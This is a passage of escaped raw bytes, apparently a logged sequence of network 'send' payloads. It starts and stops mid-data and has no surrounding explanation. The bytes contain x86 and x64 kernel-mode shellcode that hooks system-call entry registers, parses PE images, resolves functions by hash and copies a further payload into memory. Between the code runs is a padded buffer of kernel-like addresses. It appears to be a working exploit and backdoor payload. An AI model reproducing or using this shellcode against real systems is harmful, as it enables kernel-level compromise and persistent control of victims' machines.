10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 15, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\